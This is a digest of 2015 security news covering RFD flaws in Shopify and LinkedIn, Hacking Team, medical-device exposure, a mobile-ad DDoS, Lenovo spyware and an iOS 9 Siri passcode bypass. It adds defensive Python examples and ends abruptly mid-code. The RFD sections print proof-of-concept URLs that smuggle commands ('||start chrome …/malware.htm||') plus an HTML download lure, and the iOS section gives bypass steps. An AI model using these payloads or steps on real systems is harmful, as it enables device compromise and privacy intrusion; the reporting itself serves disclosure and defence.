Vulnerability in iOS App Allows Attacker to Upload Malicious File

An arbitrary file upload vulnerability has been discovered in an iOS app that allows an attacker to deliver a malicious file during a file transfer operation.
The app is Photos in Wi-Fi v1.0.1. The vulnerability, discovered by the Vulnerability Laboratory Research Team, allows remote attackers to upload a malicious file to the iOS device, compromising the app's Wi-Fi transfer service and potentially letting the attacker take control of it.

The vulnerability is triggered when the user uploads a file from their Camera Roll to the app. Remote attackers can intercept the transfer, tamper with the `filename` value in the live session and upload an arbitrary malicious file.
The attacker then requests the uploaded file through the app's `asset.php`, which executes the stored malicious file and gives the attacker access to the iOS app.
Benjamin Kunz Mejri of Vulnerability Lab, who discovered the bug, commented in an email to SCMagazineUK.com that his team has logged over “400 zero-day bugs in apps” and has had “several discussions with Apple” regarding protecting the App Store.
Exploitation of remote web vulnerabilities of this kind requires no user interaction and no privileged web application user account, which makes the attack relatively easy to execute, according to Mejri.
Successful exploitation of the arbitrary file upload vulnerability results in compromise of the web server, web module, website and/or DBMS.
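As an added illustration (this is not code from the Photos in Wi-Fi app, whose source is not shown here), the two Python functions below contrast the pattern behind this class of bug, trusting a client-supplied `filename` and storing the upload under it, with a hardened version that picks the on-disk name itself. The upload directory and the extension allowlist are assumptions made for the example.

```python
import os
import re
import secrets

# Assumed storage directory and allowlist for this example; the real app's
# values are not known from the advisory.
UPLOAD_DIR = "/var/app/uploads"
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif", ".heic"}
_SAFE_STEM = re.compile(r"[^A-Za-z0-9_-]")


def target_path_vulnerable(filename: str) -> str:
    """Vulnerable: the client's 'filename' is used as-is.
    A tampered value such as 'shell.php' or '../asset.php' lands wherever the
    attacker says, with whatever extension they choose, and can later be
    requested and executed by the server."""
    return os.path.join(UPLOAD_DIR, filename)


def target_path_hardened(filename: str) -> str:
    """Hardened: derive the on-disk name ourselves, keep only an allowlisted
    extension and never let the client control the directory."""
    # 1. Drop any directory component the client sent (../, absolute or \ paths).
    base = os.path.basename(filename.replace("\\", "/"))
    # 2. Only the last extension counts: 'shell.php.jpg' becomes '.jpg' (stored
    #    inertly as an image), 'shell.jpg.php' is '.php' and is rejected.
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED_EXT:
        raise ValueError(f"extension {ext!r} not allowed")
    # 3. Replace the client stem with a random token, keeping a sanitised,
    #    length-capped hint of the original name for humans.
    hint = _SAFE_STEM.sub("_", stem)[:32] or "upload"
    path = os.path.join(UPLOAD_DIR, f"{hint}-{secrets.token_hex(8)}{ext}")
    # 4. Defence in depth: the resolved path must still be inside UPLOAD_DIR.
    real_dir = os.path.realpath(UPLOAD_DIR)
    if os.path.commonpath([real_dir, os.path.realpath(path)]) != real_dir:
        raise ValueError("path escapes upload directory")
    return path


def rejects(filename: str) -> bool:
    """True if the hardened handler refuses this client-supplied filename."""
    try:
        target_path_hardened(filename)
    except ValueError:
        return True
    return False
```

The naming fix only removes the attacker's control over where and under what name the file lands; the second half of the advisory's attack, a server-side script that executes stored uploads on request, is closed by keeping UPLOAD_DIR outside any interpreter-handled web root and serving its contents as static, non-executable files.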

Google Security Researcher Reveals Zero-Day Bugs in Kaspersky

A security researcher at Google has discovered more zero-day vulnerabilities in Kaspersky's anti-virus software.
Tavis Ormandy, the Google researcher, found several vulnerabilities. One concerned a protection Kaspersky relies on to randomise where code is placed in memory, so that an attacker cannot easily predict its location. Unfortunately the placement was not actually random: Ormandy used a DLL (a Windows shared-library file) that was loaded at a predictable address to build a working exploit.
A zero-day vulnerability is a previously unknown, unpatched flaw. Such flaws are considered extremely dangerous: they are called zero-days because, once one is discovered, developers have had ‘zero days’ to fix it, and it may be about to be exploited or may already have been.
This news comes shortly after a security researcher found flaws in FireEye products over the weekend that can result in unauthorised file disclosure. Ormandy himself disclosed several security flaws earlier this month in Sophos and ESET software.
Kaspersky is producing a fix for the vulnerability and published an official statement, saying that “We would like to thank Mr. Tavis Ormandy for reporting to us a buffer overflow vulnerability, which our specialists fixed within 24 hours of its disclosure.”
They added that “a fix has already been distributed via automatic updates to all our clients and customers”.

Tools Used For Hacking The "Hacking Team" Leaked


Two hacking groups with apparent ties to China have been using exploits leaked from Hacking Team, the infamous Italian security firm known for doing business with the intelligence agencies of undemocratic regimes.
Following the recent attack on the Italian firm, it has become clear that two leading China-linked hacking groups have been using its exploits in attacks on sectors such as aerospace and defense, telecommunications, healthcare and energy. Hacking Team, which lost over 400GB of data to the intruders, sells surveillance software to intelligence organizations around the world, and the tools it uses were made public after the attack.
The company itself does not enjoy a high reputation. In 2012 it was named an “enemy of the Internet” by Reporters Without Borders because, as mentioned above, it provides surveillance and hacking tools to law enforcement and intelligence services in dozens of countries, not excluding regimes accused of serious abuses and crimes against humanity. The intruders published the stolen data online, where it was examined by cybersecurity experts.
Other criminals then mined the leak for what Hacking Team had hoarded, above all zero-day exploits. A zero-day is a software flaw unknown even to the software's vendor, so no patch exists and defending against it is very hard.
It was initially believed that the two groups were not cooperating; the latest evidence suggests the contrary. FireEye observed both of them using Hacking Team's zero-day exploits against the widely used Adobe Flash Player. “Zero-day exploits are extremely valuable to attack groups,” Bryce Boland, FireEye's chief technology officer for Asia Pacific, told the South China Morning Post. “When we discover attackers using unknown exploits, we work with technology vendors to get them addressed quickly.”
He said that Hacking Team was playing with fire by stockpiling such exploits in the first place. “By design, stockpiling exploits maintains a vulnerable status quo. [It] also introduces a new risk that the exploits could be stolen and used by others,” he said. The Flash exploit was apparently sold to the company by an anonymous Russian hacker for US $45,000, according to an email included in the leaks.
The groups were able to carry out their attacks even though Adobe issued a patch soon after the problem became known, since many users keep running older versions of software well after an update is released. In an interview with Italy's newspaper La Stampa, Hacking Team's chief executive, David Vincenzetti, warned that the leak could be used by terrorists.
“Sufficient code was released to permit anyone to deploy the software against any target of their choice,” said Vincenzetti.

Reflected File Download Vulnerability Found on Shopify, the E-commerce Platform Used to "Sell on Facebook"


Shopify is a multi-channel commerce platform that helps people sell online, in-store and everywhere in between. Security researcher David Sopas of WebSegura has discovered a Reflected File Download vulnerability in the Shopify service. Sopas sent a security report to Shopify explaining that exploiting it requires no authentication: no access_token, no api_key and not even a Shopify account.

The vulnerability affects the app.shopify.com service. Sopas explained that opening the following link in Internet Explorer 8 or 9 shows a download dialog for a file named track.bat. If the user runs the batch file it launches Google Chrome on an attacker-chosen web page; in this proof of concept the page just displayed some text, but a bad actor could clearly use it for malicious activity.
https://app.shopify.com/services/signup/track.bat?callback=foobar&signup_page=http%3A%2F%2Fwww.shopify.com%2F%22||start%20chrome%20davidsopas.com/poc/malware.htm||&_=
Sopas observed that in the latest versions of other browsers (Chrome, Opera, Firefox, the Android Browser and Chrome for Android) the victim has to visit a web page that forces the download using the HTML5 download attribute on an <a> tag:
“When the victim visits a specially crafted page with the code above and clicks the image it will show the download dialog, and after downloading it will show that the file is coming from Shopify servers,” states Sopas in a blog post.
Reflected File Download attacks are insidious because victims usually do not suspect they have been targeted: the malicious file appears to be offered for download by a trusted source, in this case the Shopify website.
In summary, a possible attack scenario is:
  1. The attacker sends a link to the victim, as they would with a CSRF or XSS attack (phishing campaigns, social networks, instant messengers, posts, etc.)
  2. The victim clicks the link, trusting Shopify as the source, and downloads the file.
  3. Once the file is executed, the victim's machine is hijacked.
Sopas criticized Shopify's handling of the issue, which he says underestimated it, as visible in the timeline he published.

Timeline:

19-03-2015 Reported this security issue to Shopify
27-03-2015 No reply, so I asked for an update
06-04-2015 First contact with Shopify; they replied that it's being processed
15-04-2015 Shopify told me that this security issue is interesting and asked for more information
15-04-2015 I sent more information and new proof-of-concept
04-05-2015 I asked for an update (no reply)
15-06-2015 I asked for another update (no reply)
16-09-2015 I asked for another update
22-09-2015 After no email from Shopify since April, they replied that they were working on fixing more urgent issues and considered mine low impact and low priority
23-09-2015 I told them that it's not a social engineering issue, but they still don't understand it
23-09-2015 Shopify told me that their prioritization is not up for discussion and that they are not patching any time soon.

Vulnerability in Medical Devices Allows Hackers to Access Devices Online

Thousands of critical medical systems, such as MRI machines, are available for hackers to access online, according to researchers.

Some 68,000 medical systems from a large unnamed US health group have been exposed, they said.

Security researchers Scott Erven and Mark Collao presented their findings at the hacker conference Derbycon.

They also revealed that they had created fake medical devices, which attracted thousands of hackers.

Interfaces connected to medical systems could be found via the search engine Shodan, the researchers told conference-goers.


The researchers used Shodan - a search engine specifically for internet-connected devices - to look for exposed software from a range of health treatment providers, such as radiology and paediatric clinics, as well as one large healthcare organisation.

They told the tech news website The Register that they ended up with "thousands of misconfigurations and direct attack vectors".

Such information would allow attackers to build up details on health organisations, including exact information about where medical devices were housed, they added.
                                                


Then it would be a case of "crafting an email and sending it to the guy who has access to that device with a payload that will run on the machine", Mr Collao said.

The researchers also said they had reported dozens of vulnerabilities to big-name medical device manufacturers over the past year.

The pair also ran an experiment to illustrate how hackers were already targeting medical devices.

For six months they ran fake MRI and defibrillator machines: software honeypots that behave like the real devices.

The two fake machines attracted tens of thousands of login attempts and some 299 attempts to download malware, the researchers said.

The fact that their "honeypot" devices attracted so much interest suggests that medical devices are a target for hackers, said security researcher Ken Munro.

He emphasised the need to make the real-life versions more secure.
"Medical devices should not be available on the public internet. They should be behind multiple layers of protection," he said.
"Based on their research, we can see that hackers will have a go at devices that are clearly critical medical systems. That is scary, if unsurprising.

"What is even scarier is that the research shows that some medical devices have already been compromised."

Security Experts at CloudFlare Observe DDoS Attack Exploiting a Mobile Ad Network

CloudFlare revealed that one of its customers was recently hit by a distributed denial-of-service (DDoS) attack that appeared to leverage a mobile ad network and malicious JavaScript. The attack relied on JavaScript that makes ordinary browsers generate well-formed HTTP requests.

Unfortunately, this kind of DDoS attack is becoming popular. In April, security researchers from the University of California at Berkeley and the University of Toronto documented a powerful weapon in the Chinese government's cyber arsenal, dubbed the Great Cannon, used to hit websites with DDoS attacks. The Great Cannon was used by Chinese authorities to knock out two anti-censorship GitHub pages, and it could also be used as a hacking tool to silently install malware on targeted machines.


The experts explained that the Great Cannon relies on malicious JavaScript injected into unencrypted traffic in order to carry on DDoS attacks.

Another similar DDoS attack was unveiled last week, when experts at Imgur discovered that a vulnerability in their platform was being exploited by attackers to target the imageboards 4chan and 8chan.

Now CloudFlare has noticed a large number of HTTP requests directed at one customer's website. The attack peaked at over 1 billion requests per hour, and a total of 4.5 billion requests reached the content delivery network's servers on the day of the attack.
The requests came from 650,000 unique IP addresses, 99.8 percent of them in China.

Experts at CloudFlare said nearly 80 percent of the requests came from mobile devices.

“Attacks like this form a new trend,” states a blog post published by CloudFlare. “They present a great danger in the internet — defending against this type of flood is not easy for small website operators.”

“There is no way to know for sure why so many mobile devices visited the attack page, but the most plausible distribution vector seems to be an ad network,” wrote CloudFlare researcher Marek Majkowski. “It seems probable that users were served advertisements containing the malicious JavaScript. [These] ads were likely showed in iframes in mobile apps, or mobile browsers to people casually browsing the internet.”

CloudFlare researchers ruled out the possibility that the attack was carried out by injecting TCP packets, as observed in the Great Cannon attack.

CloudFlare provided the following description for the attack scenario:
  • A user was casually browsing the Internet or opened an app on the smartphone.
  • The user was served an iframe with an advertisement.
  • The advertisement content was requested from an ad network.
  • The ad network forwarded the request to the third-party that won the ad auction.
  • Either the third-party website was the “attack page”, or it forwarded the user to an “attack page”.
  • The user was served an attack page containing a malicious JavaScript which launched a flood of XHR requests against CloudFlare servers.
“It seems the biggest difficulty is not in creating the JavaScript — it is in effectively distributing it. Since an efficient distribution vector is crucial in issuing large floods, up until now I haven’t seen many sizable browser-based floods,” Majkowski added.
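The flood CloudFlare describes leaves a recognisable trace in ordinary web-server access logs: many distinct, mostly mobile clients hitting the same one or two API paths, all carrying the same Referer, the "attack page" that served the JavaScript. The Python below, added here as an example and not CloudFlare's own tooling, parses combined-format log lines and flags such referers. The log lines, IP addresses, hostnames, paths and thresholds are all constructed for the example.

```python
import re
from collections import defaultdict

# Apache/Nginx "combined" log format: ip ident user [time] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
MOBILE_UA = re.compile(r"Mobile|Android|iPhone|iPad", re.I)

# Constructed user agents and attack-page URL for the sample log.
ANDROID = "Mozilla/5.0 (Linux; Android 5.1; SM-G920F) AppleWebKit/537.36 Chrome/45.0.2454.94 Mobile Safari/537.36"
IPHONE = "Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 Mobile/12H143 Safari/600.1.4"
DESKTOP = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 Chrome/45.0.2454.94 Safari/537.36"
ATTACK_PAGE = "http://ads.example/attack.html"


def _line(ip, path, referer, ua, sec):
    return (f'{ip} - - [25/Sep/2015:10:00:{sec:02d} +0000] "GET {path} HTTP/1.1" '
            f'200 17 "{referer}" "{ua}"')


def sample_log():
    """Constructed log: six clients sitting on the attack page each fire two XHRs
    at the same endpoint; two normal visitors fetch pages with unrelated referers."""
    attackers = [("203.0.113.10", ANDROID), ("203.0.113.11", IPHONE),
                 ("203.0.113.12", ANDROID), ("203.0.113.13", IPHONE),
                 ("203.0.113.14", ANDROID), ("203.0.113.15", DESKTOP)]
    lines = [_line(ip, f"/api/ping?x={n}{k}", ATTACK_PAGE, ua, n)
             for n, (ip, ua) in enumerate(attackers) for k in range(2)]
    lines.append(_line("198.51.100.7", "/index.html", "-", DESKTOP, 2))
    lines.append(_line("198.51.100.8", "/about.html", "http://www.example.com/", DESKTOP, 3))
    return "\n".join(lines) + "\n"


def summarize(log_text):
    """Aggregate requests overall and per Referer: counts, distinct IPs, mobile share, paths."""
    total, mobile, ips = 0, 0, set()
    by_ref = defaultdict(lambda: {"requests": 0, "ips": set(), "mobile": 0, "paths": set()})
    for raw in log_text.splitlines():
        m = LOG_RE.match(raw)
        if not m:
            continue                                     # skip lines that do not parse
        total += 1
        ips.add(m["ip"])
        is_mobile = bool(MOBILE_UA.search(m["ua"]))
        mobile += is_mobile
        r = by_ref[m["referer"]]
        r["requests"] += 1
        r["ips"].add(m["ip"])
        r["mobile"] += is_mobile
        r["paths"].add(m["path"].split("?", 1)[0])       # group by endpoint, not query
    return {"total": total, "unique_ips": len(ips),
            "mobile_fraction": mobile / total if total else 0.0, "by_referer": by_ref}


def flag_browser_flood(summary, min_ips=100, min_mobile_share=0.5, max_paths=3):
    """Referers that look like an attack page: many distinct clients, mostly mobile,
    all funnelled onto a handful of endpoints. Thresholds are assumptions to be
    tuned against a site's normal traffic."""
    hits = []
    for ref, r in summary["by_referer"].items():
        if ref == "-":
            continue                                     # direct traffic has no page to blame
        share = r["mobile"] / r["requests"]
        if len(r["ips"]) >= min_ips and share >= min_mobile_share and len(r["paths"]) <= max_paths:
            hits.append({"referer": ref, "ips": len(r["ips"]),
                         "requests": r["requests"], "mobile_share": round(share, 2)})
    return sorted(hits, key=lambda h: -h["ips"])
```

Once a referer is flagged, the cheap mitigation is a rule keyed on that Referer header (challenge or drop), which the victim site can deploy without touching the ad network; the unique-IP count matters more than the raw request count, because the same bot on one machine is easy to rate-limit while hundreds of thousands of real browsers are not.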

Here's How Yahoo! Maintains the Privacy of Its Users

Yahoo has been recognized by the Electronic Frontier Foundation (EFF) for its security and its protection of user data. The EFF credited Yahoo for publishing a transparency report, for demanding a warrant before handing user data to government authorities and for promising to inform users before their data is handed over.

Yahoo associate general counsel Aaron Altschuler said:
“As always, we will continue our efforts to protect our users’ information from unclear, improper, overbroad or unlawful government requests"
Yahoo opposes mass surveillance and has enabled HTTPS encryption across major web services such as Yahoo Mail and Yahoo Search. To further protect user data, the company is rolling out end-to-end encryption for its mail service.

Yahoo also published its transparency report for the first half of the year. According to the report, government requests for data on its users are up compared with the last six months of 2014.
Yahoo received 5,221 government requests for user data and disclosed data in response to only 1,258 of them.

In March, Yahoo reported on the last six months of 2014: it had received 4,865 requests from the U.S. covering a total of 9,752 user accounts, and provided details in 1,157 cases. Yahoo provided non-content data in 3,174 of the cases. Non-content data is information provided by users when registering an account with Yahoo, such as the user's name, IP address and other details.


The company also received 227 global emergency disclosure requests, which are made when governments seek information in emergencies that could involve danger of death or serious physical injury.  percent of those requests were followed.

Make the "Tor Connection" Exit Node More Secure Using a Simple Script


To make the Tor exit node more secure, "dustyfresh" published an open-source nw.js app on GitHub.

The app lets the user request a new exit node for the Tor connection, which the author says makes the connection more secure.
Dustyfresh said,"I made a simple nw.js app just to test the concept of making an application that would allow you to control the onion router and request a new exit node / identity."
Tor is a way to access the internet anonymously, so that traffic is hard to trace back to the user. There are, however, limitations and risks at the Tor exit node. When a user requests a web page over the Tor network, the request passes through several randomly selected relays before leaving the network. The last relay, where traffic leaves the Tor network and connects to the open internet, is called the exit node.

This stops the website from learning the real user's IP address and location (it sees only the exit node's) and stops the user's ISP from seeing which sites are visited. The exit node itself, however, sees the traffic it passes to the destination, so traffic can be monitored there.

In other words, the last hop, where traffic leaves the Tor relays and joins the open network, can be monitored, as shown in the image below:

As the researcher notes, data sent over SSL/TLS is encrypted, but the connection can still be intercepted, because the addressing around the SSL/TLS payload is not encrypted. Tor, on the other hand, hides who is talking to whom: even the relays do not know who requested the traffic they pass along.

Running a Tor relay means donating some of your computer's bandwidth to send and receive data on the Tor network. According to the Tor Project, the only requirement is internet bandwidth of 50 kilobytes (not kilobits) per second, about 10 percent of standard cable-modem bandwidth.
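What the nw.js app does underneath is talk to Tor's control port. The Python below, written for this digest and not dustyfresh's code, does the same directly: it speaks the Tor control protocol (AUTHENTICATE, then SIGNAL NEWNYM) and parses the replies. The host, port and password are assumptions for a local tor with "ControlPort 9051" and "HashedControlPassword" in its torrc; the ScriptedConn class is a constructed stand-in for a socket so the client can be exercised offline. One caveat the page does not spell out: NEWNYM asks Tor for fresh circuits, it does not guarantee a different exit relay, and Tor honours it at most once every ten seconds.

```python
import io
import socket


class ControlReplyError(RuntimeError):
    pass


class TorController:
    """Minimal synchronous client for Tor's text control port."""

    def __init__(self, conn):
        self._conn = conn                      # socket-like: sendall(), makefile(), close()
        self._rfile = conn.makefile("rb")

    def _read_reply(self):
        """Read one complete reply. A line is '250-text' (more lines follow),
        '250+text' (a data block terminated by a lone '.' follows) or
        '250 text' (final line). Returns (status code, list of line texts)."""
        lines = []
        while True:
            raw = self._rfile.readline()
            if not raw:
                raise ControlReplyError("control connection closed")
            text = raw.decode("utf-8", "replace").rstrip("\r\n")
            code, sep, rest = text[:3], text[3:4], text[4:]
            if not code.isdigit() or sep not in ("-", "+", " "):
                raise ControlReplyError(f"malformed reply line: {text!r}")
            if sep == "+":
                data = []
                while True:
                    d = self._rfile.readline().decode("utf-8", "replace").rstrip("\r\n")
                    if d == ".":
                        break
                    data.append(d[1:] if d.startswith("..") else d)   # undo dot-stuffing
                rest = rest + "\n" + "\n".join(data)
            lines.append(rest)
            if sep == " ":
                return int(code), lines

    def command(self, cmd):
        """Send one command line and return the reply lines; 2xx is success."""
        self._conn.sendall((cmd + "\r\n").encode("utf-8"))
        code, lines = self._read_reply()
        if code // 100 != 2:
            raise ControlReplyError(f"{cmd.split()[0]} failed: {code} {lines[-1]}")
        return lines

    def authenticate(self, password):
        # The password is sent as a QuotedString: backslash and double quote escaped.
        quoted = password.replace("\\", "\\\\").replace('"', '\\"')
        return self.command(f'AUTHENTICATE "{quoted}"')

    def new_identity(self):
        """Ask tor for clean circuits. Tor replies 250 OK even when it rate-limits
        the signal (at most one NEWNYM every 10 s), and a new identity means fresh
        circuits, not a guarantee of a different exit relay."""
        return self.command("SIGNAL NEWNYM")

    def close(self):
        try:
            self.command("QUIT")
        finally:
            self._conn.close()


class ScriptedConn:
    """Constructed stand-in for a socket: returns canned replies, records what was sent."""

    def __init__(self, canned_replies: bytes):
        self.sent = []
        self._buf = io.BytesIO(canned_replies)

    def sendall(self, data):
        self.sent.append(data)

    def makefile(self, mode):
        return self._buf

    def close(self):
        pass


def request_new_identity(host="127.0.0.1", port=9051, password=""):
    """Real use against a local tor: authenticate, send NEWNYM, disconnect."""
    ctl = TorController(socket.create_connection((host, port), timeout=5))
    ctl.authenticate(password)
    ctl.new_identity()
    ctl.close()
```

If the control port is protected with CookieAuthentication instead of a password, the AUTHENTICATE argument is the hex-encoded contents of the cookie file rather than a quoted string; the reply parsing above is unchanged.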

280 'Pirate' Websites Blocked in Russia Under Copyright Law


Access to over 280 'pirate' websites has been restricted in Russia since the introduction of an amended copyright law in 2013. In addition to The Pirate Bay and the huge Ukrainian file-hosting site EX.ua, streaming sites such as Primewire are affected. Next week rightsholders will apply to have the leading local torrent site RUTracker blocked permanently.

Following intense pressure from both local and international rightsholders, Russia has over the past two years taken significant steps towards cracking down on internet piracy.

August 1, 2013 saw the introduction of a new copyright law that gave rightsholders a mechanism to have sites blocked by ISPs if they did not respond to takedown requests within 72 hours.

Reporting on the past two years of activity, local telecoms watchdog Roskomnadzor has now disclosed how much the legislation has been used by rightsholders and what action has been taken.

“Since August 2013, Roskomnadzor has received 189 complaints from rights holders. It is worth noting that we are presently limiting access to 282 sites that violate copyright and other related rights,” Roskomnadzor chief Alexander Zharov told RIA.

Unsurprisingly the list includes The Pirate Bay, which was blocked in June 2015 following a complaint from Mosfilm, one of the biggest European film studios.

Other sites currently blocked include the well-known movie streaming site Primewire. Ukraine-based file-hosting giant EX.ua is also affected, as are the library sites flibusta.net and loveread.ws, which have combined traffic of over forty million visitors per month. Sports streaming portal Livetv.sx, which reportedly attracts 27 million visits, is also restricted.

While blockades in Russia may be full, partial or lifted if cooperation is forthcoming, earlier this year the authorities also made it clear that repeat offenders would not be tolerated. Amendments to the copyright law introduced on May 1 indicated what lay ahead.

“This development means that the systematic violation of intellectual property rights will lead to sites providing access to pirated content being blocked forever,” the government declared.

It now seems that RUTracker, Russia's most-visited torrent site, and the well-known music portal ProstoPleer have tested that promise to breaking point.

“A few days ago a plea was filed by an association of rightsholders that may lead to constant blocks on two of the biggest pirate resources,” Roskomnadzor's Zharov confirms.

Both RUTracker and Pleer were subject to earlier copyright complaints but reportedly did not deal with them as required under the law. The present action comes from the National Federation of the Music Industry (NFMI), an association that counts Sony, Universal, Warner and EMI among its members.

“We decided to file a testimony with the court soon,” says NFMI chief operating officer Leonid Agronov.

The music industry association said it tried to negotiate with the sites over the removal of pirated content, but those discussions did not yield results. Countering, Pavel Rassudov of the local Pirate Party feels that blockades will prove ineffective.

“People learn how to bypass these blocks, and the increase in their number will only result in more frequent use of CGI proxies and the Tor network,” Rassudov says.

How to Enable 3D Touch-Style Quick Actions on Older iPhones

3D Touch is the headline feature of the iPhone 6s and 6s Plus. It lets users carry out “Quick Actions” from the home screen, performing tasks even faster than before.
Savvy jailbreakers have released a free tweak called ForceTouchActivator, which imitates 3D Touch by using long presses to extend the functionality of older iPhones. Currently the tweak is limited to carrying out “Quick Actions” from the home screen via a long press.

ForceTouchActivator is available through the BigBoss repository in Cydia. It needs to be configured in Activator as shown in the screenshot below:

Here’s a video demo of the tweak in action, courtesy TechMe0ut:

China spies on airline passengers with IMSI-catchers

John McAfee, the former owner of the McAfee security firm, has spoken about the Chinese government's ability to spy on the customers of four airlines.

McAfee has never revealed the names of the airlines and never explained how he obtained the information, but he described the full espionage campaign.

First, he distributed Android software that had the capability to detect “man in the middle attacks by devices that emulate legitimate cell phone towers, to hundreds of international travelers flying with four highly renowned airlines”.

The software looks for anomalies that IMSI-catchers (named after the International Mobile Subscriber Identity they capture) produce and that their manufacturers cannot hide.

So what is an IMSI-catcher?
“IMSI-catchers are devices that emulate cell phone towers. They trick our smartphones into believing a cell tower suddenly appeared in close range and entices our phones to connect through it.”

If your phone is caught by an IMSI-catcher, you are in trouble. Once it is connected to the fake cell tower, a man-in-the-middle attack is performed: “the IMSI-catcher analyses our configuration and “pushes” the necessary software into our smartphones in order for some third party related to the IMSI catcher to take control.”

When travelers tried to connect to the onboard internet, a module was pushed to the connecting smartphone that silently switched on its 3G or 4G radio (without showing the corresponding icon). At that point an onboard IMSI-catcher connected to the phone and compromised the traveler's device.

It then checks whether an Android app called “Silent Logging” is already installed; if not, the app is pushed to the device.

“Silent Logging” exists to spy on you; the permissions it uses were shown in an image that accompanied the original report.
“After Silent Logging is activated, a spyware app is downloaded to the users’ smartphone that utilises the Silent Logging app, unless the phone is “physically wiped” by the manufacturer, this software remains forever.”

If you attempt a factory reset yourself, be aware that the spyware detects it and merely simulates a factory reset.

Once this spyware is installed, your device is available for the government to check on you: reading emails and SMS, recording video and audio, and so on, all of it sent to China.

Access Photos and Contacts on iOS 9 Without the PIN

"Videosdebarraquito", a YouTube user, discovered a security flaw that lets anyone see the photos and contacts on an iOS 9 device without the passcode.
The vulnerability lets anyone use Siri to access an iPhone owner's private data, and it is very easy to exploit.

Here’s how it works:

On any PIN-protected iPhone running iOS 9, enter an incorrect PIN four times. On the fifth attempt, enter only three digits, then hold down the home button to bring up Siri as you enter the fourth (iOS locks the device for one minute after five incorrect attempts, so the fifth attempt must not be completed).
Video Demonstration

As the video shows, this hole gives anyone access to all the private photos on the device as well as all the contacts. Bear in mind that throughout all of this the phone is still locked.
Unfortunately, every user who updated to iOS 9 is vulnerable to this simple trick.

How to Protect an iOS 9 Device From the Vulnerability

All you have to do is disable access to Siri while the phone is locked: open the Settings app, tap “Touch ID & Passcode”, scroll to the “Allow access when locked” section and turn the Siri toggle off.
Siri is enabled on the lock screen by default, though, so most users running iOS 9 are currently exposed.

Once Again, Pre-installed Spyware Found on Lenovo Laptops





A factory-refurbished ThinkPad shipped with Windows 7 and a scheduled task that ran once a day, aggregating usage information about what you do with your PC and exfiltrating it to an analytics company.

The fact that this was happening was buried deep in the user “agreement” that came with the machine.

This is the third preloaded-spyware scandal to hit Lenovo this year. First it was caught installing Superfish, which grossly compromised user security by installing a man-in-the-middle root certificate into the operating system; then it was caught storing persistent, self-reinstalling crapware in a part of the BIOS reserved for custom drivers.

This latest scandal is especially noteworthy because it touches the ThinkPad, the rock-solid laptop brand the company acquired from IBM.

But this kind of appalling behavior points to a serious failing in the company's management and calls into question the whole firm's policy and approach toward its customers.

The 21st-century quip has it that if you are not paying for the product, you are the product. But with Lenovo machines this year, it seems that even though you are paying for the product, you are still the product.

The task that gave me pause is called "Lenovo Customer Feedback Program 64". It was running daily. Its description in Task Scheduler reads: "This task uploads Customer Feedback Program information to Lenovo".



The program that runs daily is Lenovo.TVT.CustomerFeedback.Agent.exe and it resides in folder C:\Program Files (x86)\Lenovo\Customer Feedback Program.

Other files in the folder were Lenovo.TVT.CustomerFeedback.Agent.exe.config, Lenovo.TVT.CustomerFeedback.InnovApps.dll and Lenovo.TVT.CustomerFeedback.OmnitureSiteCatalyst.dll.

According to Wikipedia, Omniture is an internet marketing and web analytics company, and SiteCatalyst (since renamed) is its software-as-a-service application for client-side web analytics.


So, while there may not be extra ads on ThinkPads, something is still watching and tracking.


On the one hand this is surprising, because the machines were refurbished and sold by IBM. On the other hand, considering Lenovo's recent history, it is not surprising at all.

Vulnerability Discovered in LinkedIn Could Hijack Your Computer

A critical Reflected File Download vulnerability in LinkedIn was discovered by security researcher David Sopas of WebSegura. He noticed the following XHR request in Chrome's inspector while browsing LinkedIn:
https://www.linkedin.com/countserv/count/share?url=http://www.site_i_was_in.pt
It is a simple request that websites make to count how many shares of their site exist on the LinkedIn network.

Trying a modified parameter in the request, as below,
https://www.linkedin.com/countserv/count/share?url="||calc||
returned the following response:
IN.Tags.Share.handleCount({"count":0,"fCnt":"0","fCntPlusOne":"1","url":"\"||calc||"});
Obviously the url parameter was not validated and was reflected into the JSON response. The researcher downloaded the response, renamed it to .bat and ran it, and the Windows calculator was launched (the escaped quote does not stop cmd.exe from treating || as a command separator).

By changing the path, the response could be downloaded directly as a batch file that runs a different Windows command:
https://www.linkedin.com/countserv/count/share;setup.bat?url="||start chrome websegura.net/malware.htm||
IE8 automatically downloaded the batch file from linkedin.com. Other browsers could be made to download it using the HTML5 download attribute:
<div align="center"><a href='https://www.linkedin.com/countserv/count/share;setup.bat?url="||start chrome websegura.net/malware.htm||' download="setup.bat" onclick="return false;"><img src="http://damnlink.com/uploaded_images/godaddy_coupons_and_godaddy_promo_code_3187745288.png" border="0" /></a></div>

Attack Scenario


· A malicious user sends a link to the victim, as they would with a CSRF or XSS attack (phishing campaigns, social networks, instant messengers, posts, etc.)

· The victim clicks the link and, trusting where it came from (LinkedIn), downloads the file

· The victim runs the file and their computer is hijacked

“A malicious user could even give more credibility to the HTML5 download site if he uses famous open redirections vulnerabilities on trusted sites like open redirects on Google or even on LinkedIn,” wrote Sopas in a blog post.

Reflected File Download (RFD) is a serious class of flaw in which a malicious file is offered for download from a trusted website, in this case LinkedIn. Whatever the file contains (virus, malware, Trojan, exploit, etc.), it is downloaded and the user is compromised. Users should be extremely careful when downloading and executing files from the web: the download link may look perfectly fine, carry a popular, trusted domain and use a secure connection, and they can still be tricked. After Sopas reported this vulnerability, LinkedIn patched it.
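The two RFD cases on this page, Shopify's track.bat callback endpoint and LinkedIn's share counter, follow the same recipe: a value reflected verbatim into a JSONP body, a filename taken from the URL path, and no header telling the browser what the response should be saved as. One added example covers both. This is illustrative Python written for this digest, not Shopify's or LinkedIn's code: a handler modelled on the LinkedIn response quoted above, in a deliberately vulnerable form beside a hardened one. The route name, the request model (a path string plus a query dict, returning status, headers and body so no web framework is needed) and the fixed download filename are assumptions.

```python
import json
import re
from urllib.parse import urlsplit

ROUTE = "/countserv/count/share"                  # assumed route, after LinkedIn's URL
DEFAULT_CALLBACK = "IN.Tags.Share.handleCount"    # from the response quoted above
CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$.]{0,63}$")
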